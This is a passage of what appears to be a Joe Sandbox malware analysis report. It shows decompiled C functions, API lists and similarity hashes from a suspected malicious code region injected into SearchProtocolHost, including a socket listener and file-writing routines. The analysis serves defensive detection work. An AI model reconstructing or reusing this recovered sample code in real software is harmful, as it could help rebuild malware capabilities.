						E02FB7848();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E02FB7EC7(_t11, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}










                                                0x02fb917c
                                                0x02fb9187
                                                0x02fb9189
                                                0x02fb918b
                                                0x02fb9190
                                                0x02fb9193
                                                0x02fb91a1
                                                0x02fb91ad
                                                0x02fb91b0
                                                0x02fb91b3
                                                0x02fb91c5
                                                0x02fb91ca
                                                0x02fb91cc
                                                0x02fb91d7
                                                0x02fb91dd
                                                0x02fb91e5
                                                0x02fb91e7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb91ce
                                                0x02fb91ce
                                                0x00000000
                                                0x02fb91ce
                                                0x02fb91b5
                                                0x02fb91b5
                                                0x02fb91b6
                                                0x02fb91b6
                                                0x02fb91e9
                                                0x02fb91ea
                                                0x02fb91ea
                                                0x02fb9195
                                                0x02fb919b
                                                0x02fb919f
                                                0x02fb91f2
                                                0x02fb91f3
                                                0x02fb91f9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb919f
                                                0x02fb9200

                                                APIs
                                                • GetLastError.KERNEL32(123,77109EB0,73B76490,02FB5D48,02FB78C5,00000000,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB9181
                                                • SetLastError.KERNEL32(00000000,?,77109EB0), ref: 02FB91EA
                                                • SetLastError.KERNEL32(00000000,?,77109EB0), ref: 02FB91F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID: 123
                                                • API String ID: 1452528299-2286445522
                                                • Opcode ID: ee3f9ae4db338364f642da10a4bdd60e55e09bb902b5aab36b79fd145c7b2c47
                                                • Instruction ID: 32172647767491657f7e3d6582128178d289e8df52060614faef7fd4920a1cb6
                                                • Opcode Fuzzy Hash: ee3f9ae4db338364f642da10a4bdd60e55e09bb902b5aab36b79fd145c7b2c47
                                                • Instruction Fuzzy Hash: E701D63BA8460526A61376376C8CFAA766FDFC17F17610428FB05E7180DFA088119D51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA8F70 Relevance: 6.1, APIs: 4, Instructions: 53networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • accept.WS2_32(?,?,?), ref: 02FA8F96
                                                • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000001,00000004), ref: 02FA8FB3
                                                • WSAIoctl.WS2_32(00000000,98000004,00000001,0000000C,00000000,00000000,00000001,00000000,00000000), ref: 02FA8FE8
                                                • new.LIBCMT ref: 02FA8FF3
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Ioctlacceptsetsockopt
                                                • String ID:
                                                • API String ID: 4090600942-0
                                                • Opcode ID: 1ac49bbec31ca5dac81196f2e982aa3f79f83823e2ed3ad6b6714be4ad36f2f1
                                                • Instruction ID: 5cb7797eb7ee0fac590d22a0161c02866a5805f7a0ab232c4a17925b743864de
                                                • Opcode Fuzzy Hash: 1ac49bbec31ca5dac81196f2e982aa3f79f83823e2ed3ad6b6714be4ad36f2f1
                                                • Instruction Fuzzy Hash: D4113DB194120CAFEB00DF94DD45FEEB7FCEB09700F200565EA05F6180D7B16A448B64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FB7CDE Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E02FB7CDE(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x2fd63a8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x2fc62a0 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x93ad1eeb
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                                0x02fb7ce3
                                                0x02fb7ce7
                                                0x02fb7cee
                                                0x02fb7cf2
                                                0x02fb7d00
                                                0x02fb7d16
                                                0x02fb7d1a
                                                0x02fb7d43
                                                0x02fb7d45
                                                0x02fb7d49
                                                0x02fb7d4c
                                                0x02fb7d4c
                                                0x02fb7d52
                                                0x02fb7d54
                                                0x00000000
                                                0x02fb7d55
                                                0x02fb7d1c
                                                0x02fb7d25
                                                0x02fb7d34
                                                0x02fb7d27
                                                0x02fb7d2a
                                                0x02fb7d30
                                                0x02fb7d30
                                                0x02fb7d38
                                                0x00000000
                                                0x02fb7d3a
                                                0x02fb7d3d
                                                0x02fb7d3f
                                                0x00000000
                                                0x02fb7d3f
                                                0x02fb7d38
                                                0x02fb7cf4
                                                0x02fb7cf9
                                                0x00000000

                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,02FA9C60,00000000,00000000,?,02FB7C85,02FA9C60,00000000,00000000,00000000,?,02FB7F44,00000006,FlsSetValue), ref: 02FB7D10
                                                • GetLastError.KERNEL32(?,02FB7C85,02FA9C60,00000000,00000000,00000000,?,02FB7F44,00000006,FlsSetValue,02FC6784,02FC678C,00000000,00000364,?,02FB91CA), ref: 02FB7D1C
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02FB7C85,02FA9C60,00000000,00000000,00000000,?,02FB7F44,00000006,FlsSetValue,02FC6784,02FC678C,00000000), ref: 02FB7D2A
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 7fa35be23534ea82b7668719750b703ab0de36785790ffbd3e37ae2370d742dc
                                                • Instruction ID: 4fe36d5db872c9d5b336830d2a04a38aae37a52ac41c2e269e717b20bff4efc1
                                                • Opcode Fuzzy Hash: 7fa35be23534ea82b7668719750b703ab0de36785790ffbd3e37ae2370d742dc
                                                • Instruction Fuzzy Hash: 5601F033F452265BD722596ADC44AA6F7989F897E1B610920FF07E72C0D730D410C7D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FB0F6C Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 72%
                                                			E02FB0F6C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t4;
				void* _t6;
				void* _t13;
				void* _t15;
				void* _t24;
				void* _t25;
				void* _t27;
				void* _t28;

				_t30 = __edi;
				_t29 = __edx;
				_t25 = __ecx;
				_t24 = __ebx;
				_push(__esi);
				E02FB6EAF(1);
				E02FB730F(E02FB173B());
				_t4 = E02FB7536();
				 *_t4 = E02FB1741();
				_t6 = E02FB0B8C(__edx, __edi, _t4, 1);
				_t37 = _t6;
				if(_t6 == 0) {
					L5:
					E02FB1477(_t29, _t30, 7);
					asm("int3");
					E02FB1777();
					__eflags = 0;
					return 0;
				} else {
					asm("fclex");
					E02FB17AC();
					E02FB0D30(_t37, E02FB17D7);
					_push(E02FB1737());
					_t13 = E02FB7237(_t25, __edx);
					_pop(_t27);
					if(_t13 != 0) {
						goto L5;
					} else {
						E02FB1744(_t13);
						_t15 = E02FB1794();
						_t39 = _t15;
						if(_t15 != 0) {
							_t15 = E02FB6F34(E02FB1741);
							_pop(_t27);
						}
						E02FB1802(E02FB1802(_t15));
						E02FB1750(_t29, _t30, _t39);
						E02FB749F(_t27, _t29, E02FB1741());
						_pop(_t28);
						L02FB6986(_t24, _t28);
						E02FB1741();
						return 0;
					}
				}
			}











                                                0x02fb0f6c
                                                0x02fb0f6c
                                                0x02fb0f6c
                                                0x02fb0f6c
                                                0x02fb0f6c
                                                0x02fb0f6f
                                                0x02fb0f7a
                                                0x02fb0f7f
                                                0x02fb0f8d
                                                0x02fb0f8f
                                                0x02fb0f98
                                                0x02fb0f9a
                                                0x02fb0fff
                                                0x02fb1001
                                                0x02fb1006
                                                0x02fb1007
                                                0x02fb100c
                                                0x02fb100e
                                                0x02fb0f9c
                                                0x02fb0f9c
                                                0x02fb0f9e
                                                0x02fb0fa8
                                                0x02fb0fb2
                                                0x02fb0fb3
                                                0x02fb0fb9
                                                0x02fb0fbc
                                                0x00000000
                                                0x02fb0fbe
                                                0x02fb0fbe
                                                0x02fb0fc3
                                                0x02fb0fc8
                                                0x02fb0fca
                                                0x02fb0fd1
                                                0x02fb0fd6
                                                0x02fb0fd6
                                                0x02fb0fdc
                                                0x02fb0fe1
                                                0x02fb0fec
                                                0x02fb0ff1
                                                0x02fb0ff2
                                                0x02fb0ff7
                                                0x02fb0ffe
                                                0x02fb0ffe
                                                0x02fb0fbc

                                                APIs
                                                • ___scrt_initialize_onexit_tables.LIBCMT ref: 02FB0F8F
                                                • __RTC_Initialize.LIBCMT ref: 02FB0F9E
                                                  • Part of subcall function 02FB0D30: __onexit.LIBCMT ref: 02FB0D36
                                                  • Part of subcall function 02FB1744: InitializeSListHead.KERNEL32(02FD6158,02FB0FC3), ref: 02FB1749
                                                • ___scrt_fastfail.LIBCMT ref: 02FB1001
                                                • ___scrt_initialize_default_local_stdio_options.LIBCMT ref: 02FB1007
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Initialize$HeadList___scrt_fastfail___scrt_initialize_default_local_stdio_options___scrt_initialize_onexit_tables__onexit
                                                • String ID:
                                                • API String ID: 3692885319-0
                                                • Opcode ID: 52f51654b21ec248a410c0b949f5f635ab1272e23b95f75f5f631d0b0aab68eb
                                                • Instruction ID: 052afcdb5d2031ce3879cf218f6f44d38adcd4d5acdc9ecd093e98f4c09138f6
                                                • Opcode Fuzzy Hash: 52f51654b21ec248a410c0b949f5f635ab1272e23b95f75f5f631d0b0aab68eb
                                                • Instruction Fuzzy Hash: DCF04462A6030AA4EA1333F35D7AADF728B4F417E5F340818A75D9B880EE69D0444CB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA6440 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E02FA6440(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4) {
				intOrPtr* _v0;
				intOrPtr* _v12;
				void* __ebp;
				signed int _t21;
				intOrPtr* _t27;
				signed int _t30;
				signed int _t34;
				void* _t35;
				intOrPtr _t36;
				signed int _t38;
				intOrPtr* _t39;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t42;
				void* _t43;
				intOrPtr _t44;
				void* _t46;
				intOrPtr* _t47;
				void* _t51;

				_t46 = __esi;
				_t43 = __edi;
				_t40 = __edx;
				_t35 = __ebx;
				_t21 = _a4;
				if(_t21 != 0) {
					__eflags = _t21 - 0xffffffff;
					if(__eflags > 0) {
						E02FB1283(__eflags);
						goto L10;
					} else {
						__eflags = _t21 - 0x1000;
						if(__eflags < 0) {
							_t21 = E02FB0A6E(__esi, __eflags, _t21);
							_t51 = _t51 + 4;
							__eflags = _t21;
							if(__eflags != 0) {
								goto L1;
							} else {
								goto L12;
							}
						} else {
							_t2 = _t21 + 0x23; // 0x2fa61ff
							_t38 = _t2;
							__eflags = _t38 - _t21;
							if(__eflags <= 0) {
								L10:
								E02FB1283(__eflags);
								goto L11;
							} else {
								_t38 = E02FB0A6E(__esi, __eflags, _t38);
								_t51 = _t51 + 4;
								__eflags = _t38;
								if(__eflags == 0) {
									L11:
									E02FB5C20(_t35, _t38, _t40, _t43, __eflags);
									L12:
									E02FB5C20(_t35, _t38, _t40, _t43, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t38);
									_t41 =  *0x2fd6a54;
									_push(_t46);
									_v12 = _t41;
									_t47 =  *((intOrPtr*)(_t41 + 4));
									__eflags =  *((char*)(_t47 + 0xd));
									if( *((char*)(_t47 + 0xd)) == 0) {
										_t27 = _v0;
										_push(_t35);
										_push(_t43);
										_t9 = _t27 + 0x10; // 0x458be85d
										_t36 =  *_t9;
										do {
											__eflags =  *((intOrPtr*)(_t27 + 0x14)) - 0x10;
											_t39 = _t47 + 0x10;
											if( *((intOrPtr*)(_t27 + 0x14)) < 0x10) {
												_t42 = _t27;
											} else {
												_t42 =  *_t27;
											}
											__eflags =  *((intOrPtr*)(_t39 + 0x14)) - 0x10;
											_t44 =  *((intOrPtr*)(_t39 + 0x10));
											if( *((intOrPtr*)(_t39 + 0x14)) >= 0x10) {
												_t39 =  *_t39;
											}
											__eflags = _t44 - _t36;
											_t29 =  <  ? _t44 : _t36;
											_t30 = E02FA51A0(_t39, _t42,  <  ? _t44 : _t36);
											_t51 = _t51 + 4;
											__eflags = _t30;
											if(__eflags != 0) {
												L23:
												if(__eflags < 0) {
													goto L25;
												} else {
													_t41 = _t47;
													_t47 =  *_t47;
													_v12 = _t41;
												}
											} else {
												__eflags = _t44 - _t36;
												if(_t44 < _t36) {
													L25:
													_t47 =  *((intOrPtr*)(_t47 + 8));
													_t41 = _v12;
												} else {
													__eflags = _t44 - _t36;
													__eflags = _t30 & 0xffffff00 | _t44 != _t36;
													goto L23;
												}
											}
											__eflags =  *((char*)(_t47 + 0xd));
											_t27 = _v0;
										} while ( *((char*)(_t47 + 0xd)) == 0);
									}
									return _t41;
								} else {
									_t3 = _t38 + 0x23; // 0x23
									_t34 = _t3 & 0xffffffe0;
									__eflags = _t34;
									 *(_t34 - 4) = _t38;
									return _t34;
								}
							}
						}
					}
				} else {
					L1:
					return _t21;
				}
			}






















                                                0x02fa6440
                                                0x02fa6440
                                                0x02fa6440
                                                0x02fa6440
                                                0x02fa6443
                                                0x02fa6448
                                                0x02fa644e
                                                0x02fa6451
                                                0x02fa648c
                                                0x00000000
                                                0x02fa6453
                                                0x02fa6453
                                                0x02fa6458
                                                0x02fa647e
                                                0x02fa6483
                                                0x02fa6486
                                                0x02fa6488
                                                0x00000000
                                                0x02fa648a
                                                0x00000000
                                                0x02fa648a
                                                0x02fa645a
                                                0x02fa645a
                                                0x02fa645a
                                                0x02fa645d
                                                0x02fa645f
                                                0x02fa6491
                                                0x02fa6491
                                                0x00000000
                                                0x02fa6461
                                                0x02fa6467
                                                0x02fa6469
                                                0x02fa646c
                                                0x02fa646e
                                                0x02fa6496
                                                0x02fa6496
                                                0x02fa649b
                                                0x02fa649b
                                                0x02fa64a0
                                                0x02fa64a1
                                                0x02fa64a2
                                                0x02fa64a3
                                                0x02fa64a4
                                                0x02fa64a5
                                                0x02fa64a6
                                                0x02fa64a7
                                                0x02fa64a8
                                                0x02fa64a9
                                                0x02fa64aa
                                                0x02fa64ab
                                                0x02fa64ac
                                                0x02fa64ad
                                                0x02fa64ae
                                                0x02fa64af
                                                0x02fa64b3
                                                0x02fa64b4
                                                0x02fa64ba
                                                0x02fa64bb
                                                0x02fa64be
                                                0x02fa64c1
                                                0x02fa64c5
                                                0x02fa64c7
                                                0x02fa64ca
                                                0x02fa64cb
                                                0x02fa64cc
                                                0x02fa64cc
                                                0x02fa64d0
                                                0x02fa64d0
                                                0x02fa64d4
                                                0x02fa64d7
                                                0x02fa64dd
                                                0x02fa64d9
                                                0x02fa64d9
                                                0x02fa64d9
                                                0x02fa64df
                                                0x02fa64e3
                                                0x02fa64e6
                                                0x02fa64e8
                                                0x02fa64e8
                                                0x02fa64ea
                                                0x02fa64ee
                                                0x02fa64f2
                                                0x02fa64f7
                                                0x02fa64fa
                                                0x02fa64fc
                                                0x02fa6509
                                                0x02fa6509
                                                0x00000000
                                                0x02fa650b
                                                0x02fa650b
                                                0x02fa650d
                                                0x02fa650f
                                                0x02fa650f
                                                0x02fa64fe
                                                0x02fa64fe
                                                0x02fa6500
                                                0x02fa6514
                                                0x02fa6514
                                                0x02fa6517
                                                0x02fa6502
                                                0x02fa6502
                                                0x02fa6507
                                                0x00000000
                                                0x02fa6507
                                                0x02fa6500
                                                0x02fa651a
                                                0x02fa651e
                                                0x02fa651e
                                                0x02fa6524
                                                0x02fa652b
                                                0x02fa6470
                                                0x02fa6470
                                                0x02fa6473
                                                0x02fa6473
                                                0x02fa6476
                                                0x02fa647a
                                                0x02fa647a
                                                0x02fa646e
                                                0x02fa645f
                                                0x02fa6458
                                                0x02fa644b
                                                0x02fa644b
                                                0x02fa644b
                                                0x02fa644b

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4d94b3da0a5e812334f92b6ea78398cba0483e66d9f29c4962a5b30bfa7424f
                                                • Instruction ID: edd15ccaa86712ff2fde148e87afd86d4ed5b115df3beac087aae75f8dbfd156
                                                • Opcode Fuzzy Hash: d4d94b3da0a5e812334f92b6ea78398cba0483e66d9f29c4962a5b30bfa7424f
                                                • Instruction Fuzzy Hash: 23F02EF3D0020146AE15FBB18E6169F325E4E107E4748463AEF1AC7148EB15E5908956
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA4E00 Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E02FA4E00(CHAR* __ecx, void* __edx, long _a4) {
				long _v8;
				int _t7;
				void* _t14;
				void* _t18;

				_push(__ecx);
				_t14 = __edx;
				_v8 = 0;
				_t18 = CreateFileA(__ecx, 0x40000000, 2, 0, 2, 0x80, 0);
				if(_t18 == 0) {
					L3:
					return 0;
				} else {
					_t7 = WriteFile(_t18, _t14, _a4,  &_v8, 0);
					_push(_t18);
					if(_t7 != 0) {
						CloseHandle();
						return 1;
					} else {
						CloseHandle();
						goto L3;
					}
				}
			}







                                                0x02fa4e03
                                                0x02fa4e19
                                                0x02fa4e1b
                                                0x02fa4e28
                                                0x02fa4e2c
                                                0x02fa4e4a
                                                0x02fa4e51
                                                0x02fa4e2e
                                                0x02fa4e39
                                                0x02fa4e3f
                                                0x02fa4e42
                                                0x02fa4e52
                                                0x02fa4e5f
                                                0x02fa4e44
                                                0x02fa4e44
                                                0x00000000
                                                0x02fa4e44
                                                0x02fa4e42

                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,73BCF7E0,00000000,?,?,02FA9845), ref: 02FA4E22
                                                • WriteFile.KERNEL32(00000000,00000000,02FA9845,00000000,00000000,?,02FA9845), ref: 02FA4E39
                                                • CloseHandle.KERNEL32(00000000,?,02FA9845), ref: 02FA4E44
                                                • CloseHandle.KERNEL32(00000000,?,02FA9845), ref: 02FA4E52
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$CreateWrite
                                                • String ID:
                                                • API String ID: 3602564925-0
                                                • Opcode ID: f7233b321c7ae710b54c68e501be1671679386b67ef926ee481a1dd3a46f19ee
                                                • Instruction ID: 44b9d52d1eb713cdae8a2c9785fa35c169646372914e94f9f4024245d5adb5bf
                                                • Opcode Fuzzy Hash: f7233b321c7ae710b54c68e501be1671679386b67ef926ee481a1dd3a46f19ee
                                                • Instruction Fuzzy Hash: 67F0E972A91218B7EB204B45AD0FFDBBB5CDB45BA1F504195FE08F728097E1681146F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA9B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 97%
                                                			E02FA9B40(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* __edi;
				void* __esi;
				signed int _t47;
				intOrPtr _t48;
				char _t50;
				intOrPtr _t54;
				void* _t55;
				intOrPtr _t57;
				char _t59;
				intOrPtr _t63;
				void* _t64;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t69;
				void* _t73;
				intOrPtr* _t76;
				void* _t80;
				void* _t84;
				void* _t85;
				intOrPtr* _t86;
				intOrPtr* _t87;
				signed int _t88;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t91;
				void* _t92;

				_t47 = 0;
				_v12 = __edx;
				_t66 = __ecx;
				_v8 = 0;
				asm("o16 nop [eax+eax]");
				while(1) {
					_t3 = _t47 + 0x2fd4e80; // 0x2fd4e80
					_t86 = _t3;
					if(_t86 == 0) {
						break;
					} else {
						_t76 = _t86;
						_t4 = _t76 + 1; // 0x2fd4e81
						_t85 = _t4;
						goto L3;
					}
					do {
						L3:
						_t57 =  *_t76;
						_t76 = _t76 + 1;
					} while (_t57 != 0);
					if(_t76 == _t85) {
						break;
					}
					_t90 = 0;
					if( *(_t66 + 0x20) <= 0) {
						L10:
						_t91 = E02FB0A6E(_t90, _t99, 0x100);
						_t92 = _t92 + 4;
						_v16 = _t91;
						_t80 = _t91 - _v8 - 0x2fd4e80;
						do {
							_t59 =  *_t86;
							_t86 = _t86 + 1;
							 *((char*)(_t80 + _t86 - 1)) = _t59;
						} while (_t59 != 0);
						if(E02FA6F70(_t66) != 0) {
							_t16 = _t66 + 0x20; // 0x4d005c
							_t17 = _t66 + 0x1c; // 0x610074
							 *((intOrPtr*)( *_t17 +  *_t16 * 4)) = _t91;
							 *(_t66 + 0x20) =  *(_t66 + 0x20) + 1;
						}
						L14:
						_t47 = _v8 - 0xffffff80;
						_v8 = _t47;
						if(_t47 < 0x600) {
							continue;
						}
						break;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t63 = 0;
						_t6 = _t66 + 0x20; // 0x4d005c
						if(_t90 <  *_t6) {
							_t7 = _t66 + 0x1c; // 0x610074
							_t63 =  *((intOrPtr*)( *_t7 + _t90 * 4));
						}
						_t64 = E02FB7612(_t86, _t90, _t63, _t86);
						_t92 = _t92 + 8;
						if(_t64 == 0) {
							goto L14;
						}
						_t90 = _t90 + 1;
						_t10 = _t66 + 0x20; // 0x4d005c
						_t99 = _t90 -  *_t10;
						if(_t90 <  *_t10) {
							continue;
						}
						goto L10;
					}
					goto L14;
				}
				_t67 = _v12;
				_t48 = 0;
				_v8 = 0;
				asm("o16 nop [eax+eax]");
				while(1) {
					_t26 = _t48 + "123"; // 0x2fd0e80
					_t87 = _t26;
					if(_t87 == 0) {
						break;
					}
					_t69 = _t87;
					_t27 = _t69 + 1; // 0x2fd0e81
					_t84 = _t27;
					do {
						_t48 =  *_t69;
						_t69 = _t69 + 1;
					} while (_t48 != 0);
					if(_t69 == _t84) {
						break;
					}
					_t88 = 0;
					if( *(_t67 + 0x20) <= 0) {
						L25:
						_t89 = E02FB0A6E(_t88, _t111, 0x100);
						_t92 = _t92 + 4;
						_v16 = _t89;
						_t73 = _t89 - _v8 - "123";
						do {
							_t50 =  *_t87;
							_t36 = _t87 + 1; // 0x3332
							_t87 = _t36;
							 *((char*)(_t73 + _t87 - 1)) = _t50;
						} while (_t50 != 0);
						if(E02FA6F70(_t67) != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x1c)) +  *(_t67 + 0x20) * 4)) = _t89;
							 *(_t67 + 0x20) =  *(_t67 + 0x20) + 1;
						}
						L29:
						_t48 = _v8 - 0xffffff80;
						_v8 = _t48;
						if(_t48 < 0x4000) {
							continue;
						}
						break;
					} else {
						goto L21;
					}
					while(1) {
						L21:
						_t54 = 0;
						if(_t88 <  *(_t67 + 0x20)) {
							_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x1c)) + _t88 * 4));
						}
						_t55 = E02FB7612(_t87, _t88, _t54, _t87);
						_t92 = _t92 + 8;
						if(_t55 == 0) {
							goto L29;
						}
						_t88 = _t88 + 1;
						_t111 = _t88 -  *(_t67 + 0x20);
						if(_t88 <  *(_t67 + 0x20)) {
							continue;
						}
						goto L25;
					}
					goto L29;
				}
				return _t48;
			}
































                                                0x02fa9b48
                                                0x02fa9b4a
                                                0x02fa9b4e
                                                0x02fa9b50
                                                0x02fa9b57
                                                0x02fa9b60
                                                0x02fa9b60
                                                0x02fa9b60
                                                0x02fa9b68
                                                0x00000000
                                                0x02fa9b6e
                                                0x02fa9b6e
                                                0x02fa9b70
                                                0x02fa9b70
                                                0x02fa9b70
                                                0x02fa9b70
                                                0x02fa9b73
                                                0x02fa9b73
                                                0x02fa9b73
                                                0x02fa9b75
                                                0x02fa9b76
                                                0x02fa9b7c
                                                0x00000000
                                                0x00000000
                                                0x02fa9b7e
                                                0x02fa9b83
                                                0x02fa9ba6
                                                0x02fa9bb0
                                                0x02fa9bb2
                                                0x02fa9bb7
                                                0x02fa9bbd
                                                0x02fa9bc3
                                                0x02fa9bc3
                                                0x02fa9bc5
                                                0x02fa9bc8
                                                0x02fa9bcc
                                                0x02fa9bd9
                                                0x02fa9bdb
                                                0x02fa9bde
                                                0x02fa9be1
                                                0x02fa9be4
                                                0x02fa9be4
                                                0x02fa9be7
                                                0x02fa9bea
                                                0x02fa9bed
                                                0x02fa9bf5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa9b85
                                                0x02fa9b85
                                                0x02fa9b85
                                                0x02fa9b87
                                                0x02fa9b8a
                                                0x02fa9b8c
                                                0x02fa9b8f
                                                0x02fa9b8f
                                                0x02fa9b94
                                                0x02fa9b99
                                                0x02fa9b9e
                                                0x00000000
                                                0x00000000
                                                0x02fa9ba0
                                                0x02fa9ba1
                                                0x02fa9ba1
                                                0x02fa9ba4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa9ba4
                                                0x00000000
                                                0x02fa9b85
                                                0x02fa9bfb
                                                0x02fa9bfe
                                                0x02fa9c00
                                                0x02fa9c07
                                                0x02fa9c10
                                                0x02fa9c10
                                                0x02fa9c10
                                                0x02fa9c18
                                                0x00000000
                                                0x00000000
                                                0x02fa9c1e
                                                0x02fa9c20
                                                0x02fa9c20
                                                0x02fa9c23
                                                0x02fa9c23
                                                0x02fa9c25
                                                0x02fa9c26
                                                0x02fa9c2c
                                                0x00000000
                                                0x00000000
                                                0x02fa9c2e
                                                0x02fa9c33
                                                0x02fa9c56
                                                0x02fa9c60
                                                0x02fa9c62
                                                0x02fa9c67
                                                0x02fa9c6d
                                                0x02fa9c73
                                                0x02fa9c73
                                                0x02fa9c75
                                                0x02fa9c75
                                                0x02fa9c78
                                                0x02fa9c7c
                                                0x02fa9c89
                                                0x02fa9c91
                                                0x02fa9c94
                                                0x02fa9c94
                                                0x02fa9c97
                                                0x02fa9c9a
                                                0x02fa9c9d
                                                0x02fa9ca5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa9c35
                                                0x02fa9c35
                                                0x02fa9c35
                                                0x02fa9c3a
                                                0x02fa9c3f
                                                0x02fa9c3f
                                                0x02fa9c44
                                                0x02fa9c49
                                                0x02fa9c4e
                                                0x00000000
                                                0x00000000
                                                0x02fa9c50
                                                0x02fa9c51
                                                0x02fa9c54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa9c54
                                                0x00000000
                                                0x02fa9c35
                                                0x02fa9cb1

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 123
                                                • API String ID: 0-2286445522
                                                • Opcode ID: 550158e53739d0481e29af591454440079922dc32effe9eb5b489071e4250294
